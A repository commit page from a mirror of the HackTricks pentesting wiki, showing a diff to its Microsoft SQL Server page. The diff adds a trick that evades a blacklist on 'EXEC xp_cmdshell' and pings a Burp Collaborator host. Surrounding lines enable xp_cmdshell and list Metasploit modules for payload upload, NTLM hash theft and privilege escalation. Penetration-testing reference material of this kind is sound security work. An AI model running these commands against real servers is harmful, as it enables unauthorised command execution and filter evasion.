0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [#2811] mssql trick

Browse source
This commit is contained in:
CPol 2021-10-27 09:30:33 +00:00 committed by gitbook-bot
parent 3896ea2eb9
commit b150f0adc0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 10 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
pentesting/pentesting-mssql-microsoft-sql-server.md
View file

@ -10,8 +10,8 @@ If you want to **share some tricks with the community** you can also submit **pu
## Basic Information
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database_server), it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server).
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
**Default port:** 1433
@ -82,7 +82,7 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
msf> use windows/manage/mssql_local_auth_bypass
```
### \*\*\*\*[**Brute force**](../brute-force.md#sql-server)\*\*\*\*
### [**Brute force**](../brute-force.md#sql-server)
## Tricks
@ -102,6 +102,9 @@ sp_configure 'xp_cmdshell', '1'
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Bypass blackisted "EXEC xp_cmdshell"
; DECLARE @x AS VARCHAR(100)=xp_cmdshell; EXEC @x ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net
```
### NTLM Service Hash gathering
@ -117,11 +120,11 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
### Abusing MSSQL trusted Links
\*\*\*\*[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
### **Read files executing scripts (Python and R)**
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
@ -143,9 +146,9 @@ print(sys.version)
GO
```
### From db_owner to sysadmin
### From db\_owner to sysadmin
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
```bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner